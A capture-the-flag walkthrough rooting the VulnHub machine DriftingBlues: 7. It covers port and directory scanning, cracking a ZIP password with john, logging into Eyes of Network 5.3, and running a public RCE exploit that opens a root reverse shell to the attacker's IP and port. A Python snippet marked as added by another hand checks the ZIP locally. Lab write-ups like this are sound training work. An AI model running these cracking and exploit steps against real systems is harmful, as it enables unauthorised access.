DriftingBlues: 7 BOOT2ROOT CTF VULNHUB WRITEUP
Welcome back to another writeup! In this post, I’ll walk you through how I rooted the seventh box in the DriftingBlues series. We’re getting closer to the final machine—let’s dive in!

The first step, as usual, is running an Nmap scan to identify any open ports that might serve as our initial access point.
nmap -A -T5 192.168.172.110

There are several ports running HTTP services, which means plenty of possibilities to explore. The next step is to check out the webpage. Since HTTPS is available, it should automatically redirect us to the secure version instead of HTTP.

It's Eyes of Network! I have a good feeling about this: if the version is 5.3, it's an instant RCE.
What is Eyes Of Network?
Eyes of Network (EON) is an open-source IT infrastructure monitoring and management tool that combines several powerful tools like Nagios, Centreon, and Nagvis into a single platform. Designed for system and network administrators, EON provides real-time monitoring, performance graphs, alerting, and visualization of networks and servers, allowing users to detect issues quickly and maintain system uptime. It offers a web-based interface for easy configuration and status overview, making it a comprehensive solution for supervising both small and large-scale IT environments.
Since we don't have any credentials at the moment, we'll set that aside for now and explore the other ports. Let's take a look at Port 66—it stands out as unusual to me.

Clicking on each of the tabs at the top doesn’t trigger any redirection or changes—the page remains completely static.
This looks a bit suspicious, so I began enumerating subdirectories on this page. At the same time, I also started scanning for subdirectories on the other HTTP services using dirsearch.
dirsearch -u http://192.168.172.110:66 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -e txt,php,html
After a while, a file was finally discovered on Port 66.

A file named eon was discovered, so the next thing I did was fetch it.
wget http://192.168.172.110:66/eon
Then check its content.

It looks like Base64, so let's decode it.
echo "encoded_text" | base64 -d
This is the plaintext.

Aha! This appears to be a ZIP file—based on the initial bytes of its content, it starts with "PK", which is a well-known file signature (also called a magic number) for ZIP archives. This signature indicates that the file likely contains compressed data, and it's worth investigating further to see if it holds any useful information or credentials we can extract.
The next thing I did was turn that Base64-encoded text back into a file using Base64.guru.
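Instead of pasting the blob into a third-party site, the decode and the magic-byte check from the steps above can be done locally. This is an added example, not code from the original writeup: it decodes the text as it was dumped to the terminal (wrapped lines and spaces dropped), verifies the PK signature, and parses the first local file header, whose general purpose flag bit 0 tells you up front whether the archive is password-protected. The sample archive and its contents are constructed here; they are not the box's real file.

```python
import base64
import io
import struct
import zipfile

# Local file header layout (PKZIP APPNOTE section 4.3.7): signature, version
# needed, general purpose bit flag, compression method, mod time, mod date,
# crc32, compressed size, uncompressed size, filename length, extra length.
LOCAL_HEADER = struct.Struct("<4sHHHHHIIIHH")
ZIP_MAGIC = b"PK\x03\x04"


def decode_blob(encoded: str) -> bytes:
    """Base64-decode text as dumped to a terminal: wrapped lines and spaces are dropped."""
    cleaned = "".join(encoded.split())
    return base64.b64decode(cleaned, validate=True)


def inspect_zip(data: bytes) -> dict:
    """Check the PK magic and parse the first local file header."""
    if not data.startswith(ZIP_MAGIC):
        raise ValueError("not a ZIP archive, first bytes: %r" % data[:4])
    fields = LOCAL_HEADER.unpack_from(data, 0)
    flags, method, name_len = fields[2], fields[3], fields[9]
    name = data[LOCAL_HEADER.size:LOCAL_HEADER.size + name_len]
    return {
        "name": name.decode("utf-8", "replace"),
        "encrypted": bool(flags & 0x1),  # bit 0: entry is password-protected
        "method": method,                 # 0 = stored, 8 = deflate
    }


def make_sample() -> str:
    """Constructed sample (not the box's real file): a one-entry archive named
    like the one found on port 66, base64-encoded and wrapped at 76 columns."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("creds.txt", "user:password\n")  # made-up contents
    raw = bytearray(buf.getvalue())
    # zipfile cannot write encrypted archives, so set bit 0 of the general
    # purpose flag (offset 6 in the local header) by hand to mimic one.
    raw[6] |= 0x1
    b64 = base64.b64encode(bytes(raw)).decode()
    return "\n".join(b64[i:i + 76] for i in range(0, len(b64), 76))


if __name__ == "__main__":
    info = inspect_zip(decode_blob(make_sample()))
    print(info)  # {'name': 'creds.txt', 'encrypted': True, 'method': 8}
```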
Now that we have the ZIP file, let's unzip it.
unzip application.zip

It's password-protected, so let's crack it. First, convert the zip file into a hash that John can work on.
zip2john application.zip > hash
Now let's crack it using john.
john --wordlist=/usr/share/wordlists/rockyou.txt hash
And...

We now have the password, so let's unzip it again!
We've now successfully retrieved the creds.txt file.

A username and a password. These might be the credentials for EON, so let's try them!

It worked—we’ve gained access! Now, let’s check which version of EON this is.

Just as I suspected—it’s version 5.3! This version is known to be vulnerable to Remote Code Execution (RCE)!

As you can see, there are so many exploits available for this version, haha! But we’ll be using the last one!
searchsploit -m php/webapps/48025.txt
Now that we’ve obtained the exploit, we’ll rename it to a .py file, since it’s actually written in Python.
mv 48025.txt exploit.py
Now let's run the exploit!

We're all set!
python3 exploit.py https://192.168.172.110 -ip 192.168.172.246 -port 1234 -user admin -password <REDACTED>

We’re in! And if you notice the shell prompt ending in a hash symbol (#), that means we’ve already gained root access!

We've successfully pwned DriftingBlues: 7!!!
This box is actually really simple; nothing new here... Now it's time for the final box!! Stay tuned!!